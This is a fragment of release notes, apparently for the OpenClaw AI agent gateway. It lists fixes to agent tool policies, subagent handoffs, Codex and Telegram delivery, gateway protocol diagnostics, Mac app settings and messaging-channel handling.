<li>Agents/skills: apply the full effective tool policy pipeline to inline <code>command-dispatch: tool</code> skill dispatch before owner-only filtering, preserving configured allow, deny, sandbox, sender, group, and subagent restrictions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4392543885" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78525" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/78525/hovercard" href="https://github.com/openclaw/openclaw/pull/78525">#78525</a>)</li>
<li>Codex: avoid spawning native hook relay subprocesses for post-tool/finalize events with no registered hook handlers while preserving pre-tool safety and approval relays. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371228983" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76552" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76552/hovercard" href="https://github.com/openclaw/openclaw/issues/76552">#76552</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4386233442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78004" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/78004/hovercard" href="https://github.com/openclaw/openclaw/pull/78004">#78004</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evgyur/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evgyur">@evgyur</a>.</li>
<li>Channel accounts: keep top-level default channel accounts visible when named accounts are added alongside default credential material, so mixed legacy/new account configs keep resolving <code>default</code> instead of silently dropping it.</li>
<li>Agents/CLI: reject empty successful CLI subprocess replies as <code>empty_response</code> and keep them out of shared auth-profile health, so blank Claude CLI results no longer become green no-payload turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464556593" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83231" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83231/hovercard" href="https://github.com/openclaw/openclaw/issues/83231">#83231</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466129017" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83421" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83421/hovercard" href="https://github.com/openclaw/openclaw/pull/83421">#83421</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Codex/Telegram: synthesize native Codex tool progress from final turn snapshots so Telegram <code>/verbose</code> stays visible when command events arrive only at completion.</li>
<li>Codex/Telegram: deliver Codex verbose tool summaries in direct message-tool-only turns while suppressing message-send and activity-log noise. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464160180" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83186" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83186/hovercard" href="https://github.com/openclaw/openclaw/pull/83186">#83186</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kurplunkin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kurplunkin">@kurplunkin</a>.</li>
<li>Mac app: make Channels settings open faster by deferring config-schema work, avoiding startup channel probes, caching decoded channel status rows, and showing only compact quick settings instead of the full generated channel schema.</li>
<li>Control UI: include the Control UI and Gateway protocol versions in protocol-mismatch errors so stale app/dashboard pairings identify which side needs rebuilding or restarting.</li>
<li>Gateway/protocol: restore Gateway WS protocol v4 and keep <code>message.action</code> room-event metadata on the existing <code>inboundTurnKind</code> wire field while preserving internal inbound-event classification.</li>
<li>Agents/tools: prefer non-webchat session-key routes when the message tool has stale webchat context, so message-tool-only replies keep delivering to the originating channel. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462346514" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82911" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82911/hovercard" href="https://github.com/openclaw/openclaw/issues/82911">#82911</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462785655" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83004" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83004/hovercard" href="https://github.com/openclaw/openclaw/pull/83004">#83004</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Channels: keep direct-message last-route writes on isolated <code>per-channel-peer</code> sessions instead of contaminating the agent main session with channel delivery context. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4030119907" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/36614" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/36614/hovercard" href="https://github.com/openclaw/openclaw/issues/36614">#36614</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aspenas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aspenas">@aspenas</a>.</li>
<li>Mac app: move the Settings sidebar toggle into the native titlebar and tighten the General pane width.</li>
<li>Mac app: keep visited Settings panes mounted so switching tabs no longer blanks and reloads their content.</li>
<li>Mac app: make Config settings open from shallow schema lookups and load selected paths on demand instead of fetching and rendering the full generated config schema up front.</li>
<li>Codex: sanitize inline image payloads before Codex app-server and OpenAI Responses replay, and clear poisoned Codex thread bindings after invalid image errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462171502" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82878" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82878/hovercard" href="https://github.com/openclaw/openclaw/issues/82878">#82878</a>.</li>
<li>Providers/GitHub Copilot: request identity-encoded Copilot API responses across token exchange, catalog, model calls, usage, and embeddings so compressed Business-account error payloads no longer reach JSON parsers as gzip bytes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462159211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82871" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82871/hovercard" href="https://github.com/openclaw/openclaw/issues/82871">#82871</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tonyfe01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tonyfe01">@tonyfe01</a>.</li>
<li>Telegram: redact nested raw-update identifiers and user metadata before verbose raw update logging, preserving useful update/message ids without exposing chat, user, command, or profile details. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462443792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82945" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82945/hovercard" href="https://github.com/openclaw/openclaw/pull/82945">#82945</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Telegram: preserve replied-to bot messages, captions, and media metadata in group reply chains so follow-up replies understand what the user is reacting to. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462136761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82863" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82863/hovercard" href="https://github.com/openclaw/openclaw/pull/82863">#82863</a>)</li>
<li>Providers/Together: update PI runtime packages to 0.74.1 and emit Together-style <code>reasoning.enabled</code>/<code>max_tokens</code> controls for reasoning-capable OpenAI-completions models.</li>
<li>Agents/diagnostics: split slow embedded-run <code>attempt-dispatch</code> startup summaries into workspace, prompt, runtime-plan, and final dispatch subspans so traces identify the delayed setup phase. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461655494" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82782" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82782/hovercard" href="https://github.com/openclaw/openclaw/issues/82782">#82782</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461658014" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82783" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82783/hovercard" href="https://github.com/openclaw/openclaw/pull/82783">#82783</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>.</li>
<li>Agents/Codex: flatten nested tool-result middleware blocks into bounded text so successful message sends are no longer replaced with <code>Tool output unavailable due to post-processing error</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462346626" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82912" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82912/hovercard" href="https://github.com/openclaw/openclaw/issues/82912">#82912</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeykrug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeykrug">@joeykrug</a>.</li>
<li>CLI/media: accept HTTP(S) URLs in <code>openclaw infer image describe --file</code>, fetching remote images through the guarded media path instead of treating URLs as local files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461995435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82837" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82837/hovercard" href="https://github.com/openclaw/openclaw/issues/82837">#82837</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462089264" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82854" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82854/hovercard" href="https://github.com/openclaw/openclaw/pull/82854">#82854</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Agents/subagents: keep session-backed parent runs active when the child wait call times out before the child session has actually settled, so late subagent completions are reconciled instead of being lost. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461685397" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82787" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82787/hovercard" href="https://github.com/openclaw/openclaw/issues/82787">#82787</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ramitrkar-hash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ramitrkar-hash">@ramitrkar-hash</a>.</li>
<li>Control UI: advertise shared Gateway protocol constants in browser connect frames, fixing protocol mismatch handshakes after protocol constant drift. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462182289" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82882" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82882/hovercard" href="https://github.com/openclaw/openclaw/issues/82882">#82882</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>.</li>
<li>Gateway: add rollback protocol-mismatch diagnostics, including client protocol ranges in Gateway logs and deep status/doctor hints for stale client processes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462019039" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82841" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82841/hovercard" href="https://github.com/openclaw/openclaw/issues/82841">#82841</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462327632" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82908" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82908/hovercard" href="https://github.com/openclaw/openclaw/pull/82908">#82908</a>)</li>
<li>Agents/subagents: keep successful keep-mode completion payloads pending after final-delivery retry exhaustion, so requester recovery no longer loses final subagent results. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4459924078" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82583" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82583/hovercard" href="https://github.com/openclaw/openclaw/issues/82583">#82583</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462746689" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82999" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82999/hovercard" href="https://github.com/openclaw/openclaw/pull/82999">#82999</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Gateway/auth: allow same-host trusted-proxy callers to use the documented local direct <code>gateway.auth.password</code> fallback after revisiting the <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4395374595" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78684" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/78684/hovercard" href="https://github.com/openclaw/openclaw/issues/78684">#78684</a> fail-closed policy, while keeping token fallback rejected and forwarded-header requests on the trusted-proxy path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4460066638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82607" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82607/hovercard" href="https://github.com/openclaw/openclaw/issues/82607">#82607</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462463433" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82953" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82953/hovercard" href="https://github.com/openclaw/openclaw/pull/82953">#82953</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Agents/subagents: wait for queued completion handoffs to reach the parent transcript before marking them announced, preventing busy parent runs from cleaning up before observing child results. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462352234" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82913" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82913/hovercard" href="https://github.com/openclaw/openclaw/issues/82913">#82913</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463073835" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83039" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83039/hovercard" href="https://github.com/openclaw/openclaw/pull/83039">#83039</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Agents/subagents: route group/channel subagent completions through message-tool-only handoffs when required and keep active-requester wake failures from dropping completion delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461749992" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82803" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82803/hovercard" href="https://github.com/openclaw/openclaw/issues/82803">#82803</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yozakura-ava/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yozakura-ava">@yozakura-ava</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/moeedahmed/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/moeedahmed">@moeedahmed</a>.</li>
<li>Memory-core: scan persisted memory source sessions on startup, comparing on-disk transcripts against the index and marking only missing/newer/resized files dirty for incremental sync. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4457246662" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82341" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82341/hovercard" href="https://github.com/openclaw/openclaw/pull/82341">#82341</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4457246662" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82341" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82341/hovercard" href="https://github.com/openclaw/openclaw/pull/82341">#82341</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>.</li>
<li>Telegram: keep the top-level default account in the account list when named accounts or bindings are added alongside top-level credentials, preserving default polling while still letting named-only configs resolve to a single account. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461704391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82794/hovercard" href="https://github.com/openclaw/openclaw/pull/82794">#82794</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461704391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82794" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82794/hovercard" href="https://github.com/openclaw/openclaw/pull/82794">#82794</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>.</li>
<li>CLI/models: reuse command-scoped plugin metadata across model listing, provider catalog, auth, and synthetic-auth checks, restoring fast <code>openclaw models</code> runs for plugin-heavy installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462172294" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82881" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82881/hovercard" href="https://github.com/openclaw/openclaw/issues/82881">#82881</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463033606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83033" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83033/hovercard" href="https://github.com/openclaw/openclaw/pull/83033">#83033</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>CLI/channels: show configured official external channels such as Discord in <code>openclaw channels list</code> when their plugin package is missing, including the install and doctor repair command instead of reporting no configured channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461817834" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82813" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82813/hovercard" href="https://github.com/openclaw/openclaw/issues/82813">#82813</a>.</li>
<li>Signal: preserve mixed-case group IDs through routing and session persistence so group auto-replies keep delivering after updates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461907881" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82827" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82827/hovercard" href="https://github.com/openclaw/openclaw/issues/82827">#82827</a>.</li>
<li>Agents/tools: keep the <code>message</code> tool available in embedded runs when it is explicitly allowed through <code>tools.alsoAllow</code> or runtime tool allowlists, so channel plugins with custom reply delivery can still use configured message sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461933704" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82833" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82833/hovercard" href="https://github.com/openclaw/openclaw/issues/82833">#82833</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cn1313113/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cn1313113">@cn1313113</a>.</li>
<li>WhatsApp: honor forced document delivery for outbound image, GIF, and video media so <code>forceDocument</code>/<code>asDocument</code> sends preserve original media bytes instead of using compressed media payloads. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4404054047" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79272" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/79272/hovercard" href="https://github.com/openclaw/openclaw/pull/79272">#79272</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/itsuzef/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/itsuzef">@itsuzef</a>.</li>
<li>WhatsApp: name outbound document attachments from their MIME type when no filename is provided, so PDF and CSV sends arrive as <code>file.pdf</code> and <code>file.csv</code> instead of an extensionless <code>file</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mcaxtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mcaxtr">@mcaxtr</a>.</li>
<li>Process/diagnostics: report active lane blockers in lane wait warnings so <code>queueAhead=0</code> no longer hides commands waiting behind active work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461701202" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82791" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82791/hovercard" href="https://github.com/openclaw/openclaw/issues/82791">#82791</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4461702387" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82792" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82792/hovercard" href="https://github.com/openclaw/openclaw/pull/82792">#82792</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>.</li>
<li>Process/diagnostics: stop counting the active processing turn as queued backlog in liveness warnings so transient max-only event-loop spikes do not surface as gateway warnings.</li>
<li>Agents/replies: classify provider conversation-state rejections and return a clear message-channel error instead of auto-resetting or falling back to a generic runner failure. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4460117536" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82616" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82616/hovercard" href="https://github.com/openclaw/openclaw/pull/82616">#82616</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dutifulbob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dutifulbob">@dutifulbob</a>.</li>
<li>Browser plugin: trust managed Chrome CDP diagnostics when launch HTTP probes race cold-start readiness, avoiding false startup failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462309858" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82904" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82904/hovercard" href="https://github.com/openclaw/openclaw/issues/82904">#82904</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462674619" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82986" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82986/hovercard" href="https://github.com/openclaw/openclaw/pull/82986">#82986</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kmanan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kmanan">@kmanan</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Android: prompt before replacing a changed Gateway TLS thumbprint, showing the old and new SHA-256 fingerprints so users can accept expected certificate rotations instead of hard failing on pin mismatch. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463285677" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83077" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83077/hovercard" href="https://github.com/openclaw/openclaw/pull/83077">#83077</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sliekens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sliekens">@sliekens</a>.</li>
<li>CLI/status: render extra gateway-like service diagnostics as warning/info output instead of error output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077671100" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46930" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46930/hovercard" href="https://github.com/openclaw/openclaw/issues/46930">#46930</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462392789" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82922" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82922/hovercard" href="https://github.com/openclaw/openclaw/pull/82922">#82922</a>) thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>.</li>
<li>Agents/failover: classify Moonshot/Kimi exhausted-balance HTTP 429 payloads as billing instead of generic rate limits, preserving billing guidance and fallback behavior. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4060463710" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43447/hovercard" href="https://github.com/openclaw/openclaw/issues/43447">#43447</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463292018" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83079" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83079/hovercard" href="https://github.com/openclaw/openclaw/pull/83079">#83079</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leno23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leno23">@leno23</a>.</li>
<li>Plugin SDK: bundle <code>openclaw/plugin-sdk/zod</code> into the published package artifact and verify the packed zod subpath stays self-contained, so pnpm global installs can register plugins without a package-local <code>zod</code> symlink. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4390279612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78398" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/78398/hovercard" href="https://github.com/openclaw/openclaw/issues/78398">#78398</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4392386441" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78515" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/78515/hovercard" href="https://github.com/openclaw/openclaw/pull/78515">#78515</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ggzeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ggzeng">@ggzeng</a>.</li>
<li>Providers/Google: drop compaction-truncated Gemini thought signatures before replay so malformed Base64 no longer aborts the next assistant turn. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462736082" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82995" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82995/hovercard" href="https://github.com/openclaw/openclaw/pull/82995">#82995</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wAngByg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wAngByg">@wAngByg</a>.</li>
